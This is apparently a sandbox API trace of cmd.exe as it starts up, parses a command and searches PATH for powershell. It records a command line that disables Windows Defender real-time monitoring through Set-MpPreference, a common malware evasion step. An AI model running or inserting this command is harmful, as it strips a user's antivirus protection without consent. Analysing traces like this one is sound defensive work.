	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x1, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x0, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x40, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x40, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x40, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.492] RegCloseKey (hKey=0x40) returned 0x0
	[0055.492] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e9a0 | out: phkResult=0x18e9a0*=0x40) returned 0x0
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x40, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x1, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x1, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x0, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x9, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x4, lpData=0x18e9ac*=0x9, lpcbData=0x18e9a4*=0x4) returned 0x0
	[0055.493] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e9a8, lpData=0x18e9ac, lpcbData=0x18e9a4*=0x1000 | out: lpType=0x18e9a8*=0x0, lpData=0x18e9ac*=0x9, lpcbData=0x18e9a4*=0x1000) returned 0x2
	[0055.493] RegCloseKey (hKey=0x40) returned 0x0
	[0055.493] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf3a
	[0055.493] srand (_Seed=0x5cdadf3a) 
	[0055.493] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0055.493] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0055.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.494] GetProcessHeap () returned 0x350000
	[0055.494] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x3602d8
	[0055.494] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3602e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0055.494] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0055.494] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.494] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0055.494] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0055.494] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0055.494] GetProcessHeap () returned 0x350000
	[0055.495] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x360be0 | out: hHeap=0x350000) returned 1
	[0055.495] GetEnvironmentStringsW () returned 0x3604f0*
	[0055.495] GetProcessHeap () returned 0x350000
	[0055.495] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x912) returned 0x362710
	[0055.495] FreeEnvironmentStringsW (penv=0x3604f0) returned 1
	[0055.495] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0055.495] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0055.495] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0055.495] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0055.495] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0055.495] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0055.495] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0055.495] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0055.495] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0055.495] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0055.495] GetProcessHeap () returned 0x350000
	[0055.495] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x30) returned 0x360158
	[0055.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f76c | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x18f76c, lpFilePart=0x18f768 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18f768*="system32") returned 0x13
	[0055.495] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0055.496] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x18f4e8 | out: lpFindFileData=0x18f4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x3507f0
	[0055.496] FindClose (in: hFindFile=0x3507f0 | out: hFindFile=0x3507f0) returned 1
	[0055.496] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x18f4e8 | out: lpFindFileData=0x18f4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x3507f0
	[0055.496] FindClose (in: hFindFile=0x3507f0 | out: hFindFile=0x3507f0) returned 1
	[0055.496] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0055.496] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0055.496] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0055.496] GetProcessHeap () returned 0x350000
	[0055.496] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362710 | out: hHeap=0x350000) returned 1
	[0055.496] GetEnvironmentStringsW () returned 0x3604f0*
	[0055.497] GetProcessHeap () returned 0x350000
	[0055.497] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x942) returned 0x361df0
	[0055.497] FreeEnvironmentStringsW (penv=0x3604f0) returned 1
	[0055.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0055.497] GetProcessHeap () returned 0x350000
	[0055.497] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x360158 | out: hHeap=0x350000) returned 1
	[0055.497] GetProcessHeap () returned 0x350000
	[0055.497] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400e) returned 0x363980
	[0055.497] GetProcessHeap () returned 0x350000
	[0055.497] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x86) returned 0x362740
	[0055.497] GetProcessHeap () returned 0x350000
	[0055.497] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x363980 | out: hHeap=0x350000) returned 1
	[0055.497] GetConsoleOutputCP () returned 0x1b5
	[0055.738] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0055.738] GetUserDefaultLCID () returned 0x409
	[0055.738] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f8ac, cchData=128 | out: lpLCData="0") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f8ac, cchData=128 | out: lpLCData="0") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f8ac, cchData=128 | out: lpLCData="1") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2
	[0055.739] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2
	[0055.739] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0055.740] GetProcessHeap () returned 0x350000
	[0055.740] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x3627d0
	[0055.740] GetConsoleTitleW (in: lpConsoleTitle=0x3627d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.740] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0055.740] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0055.740] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0055.740] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0055.741] GetProcessHeap () returned 0x350000
	[0055.741] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x363980
	[0055.741] GetProcessHeap () returned 0x350000
	[0055.741] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x363980 | out: hHeap=0x350000) returned 1
	[0055.741] _wcsicmp (_String1="powershell", _String2=")") returned 71
	[0055.741] _wcsicmp (_String1="FOR", _String2="powershell") returned -10
	[0055.741] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10
	[0055.741] _wcsicmp (_String1="IF", _String2="powershell") returned -7
	[0055.741] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7
	[0055.741] _wcsicmp (_String1="REM", _String2="powershell") returned 2
	[0055.741] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2
	[0055.741] GetProcessHeap () returned 0x350000
	[0055.741] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x3629e8
	[0055.742] GetProcessHeap () returned 0x350000
	[0055.742] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1e) returned 0x35e988
	[0055.742] GetProcessHeap () returned 0x350000
	[0055.742] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x6e) returned 0x362a48
	[0055.743] GetConsoleTitleW (in: lpConsoleTitle=0x18f5a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.743] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0055.743] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0055.743] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0055.743] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0055.743] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0055.743] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0055.743] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0055.743] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0055.743] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0055.743] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0055.743] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0055.743] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0055.743] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0055.743] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0055.743] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0055.743] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0055.743] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0055.743] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0055.743] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0055.744] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0055.744] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0055.744] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0055.744] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0055.744] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0055.744] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0055.744] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0055.744] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0055.744] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0055.744] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0055.744] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0055.744] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0055.744] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0055.744] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0055.744] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0055.744] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0055.744] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0055.744] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0055.744] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0055.744] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0055.744] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0055.744] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0055.744] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0055.744] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0055.744] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0055.744] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0055.744] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0055.744] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0055.744] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0055.744] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0055.744] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0055.744] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0055.744] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0055.744] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0055.744] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0055.744] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0055.744] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0055.745] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0055.745] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0055.745] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0055.745] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0055.745] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0055.745] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0055.745] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0055.745] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0055.745] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0055.745] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0055.745] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0055.745] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0055.745] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0055.745] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0055.745] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0055.745] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0055.745] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0055.745] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0055.745] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0055.745] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0055.745] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0055.745] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0055.745] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0055.745] _wcsicmp (_String1="powershell", _String2="FOR") returned 10
	[0055.745] _wcsicmp (_String1="powershell", _String2="IF") returned 7
	[0055.745] _wcsicmp (_String1="powershell", _String2="REM") returned -2
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x362ac0
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x84) returned 0x362cd8
	[0055.746] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x418) returned 0x3507f0
	[0055.746] SetErrorMode (uMode=0x0) returned 0x0
	[0055.746] SetErrorMode (uMode=0x1) returned 0x0
	[0055.746] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3507f8, lpFilePart=0x18f0c4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18f0c4*="system32") returned 0x13
	[0055.746] SetErrorMode (uMode=0x0) returned 0x1
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3507f0, Size=0x46) returned 0x3507f0
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3507f0) returned 0x46
	[0055.746] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0055.746] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x144) returned 0x362d68
	[0055.746] GetProcessHeap () returned 0x350000
	[0055.746] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x280) returned 0x350840
	[0055.750] GetProcessHeap () returned 0x350000
	[0055.750] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x350840, Size=0x146) returned 0x350840
	[0055.751] GetProcessHeap () returned 0x350000
	[0055.751] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x350840) returned 0x146
	[0055.751] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.751] GetProcessHeap () returned 0x350000
	[0055.751] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe0) returned 0x362eb8
	[0055.751] GetProcessHeap () returned 0x350000
	[0055.751] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x362eb8, Size=0x76) returned 0x362eb8
	[0055.751] GetProcessHeap () returned 0x350000
	[0055.751] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x362eb8) returned 0x76
	[0055.752] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.752] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.752] GetLastError () returned 0x2
	[0055.752] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.752] GetLastError () returned 0x2
	[0055.752] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.752] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.752] GetLastError () returned 0x2
	[0055.752] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.753] GetLastError () returned 0x2
	[0055.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.753] GetLastError () returned 0x2
	[0055.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.753] GetLastError () returned 0x2
	[0055.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.753] GetLastError () returned 0x2
	[0055.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.753] GetLastError () returned 0x2
	[0055.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.754] GetLastError () returned 0x2
	[0055.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0xffffffff
	[0055.754] GetLastError () returned 0x2
	[0055.754] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x18ee40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ee40) returned 0x362f38
	[0055.754] GetProcessHeap () returned 0x350000
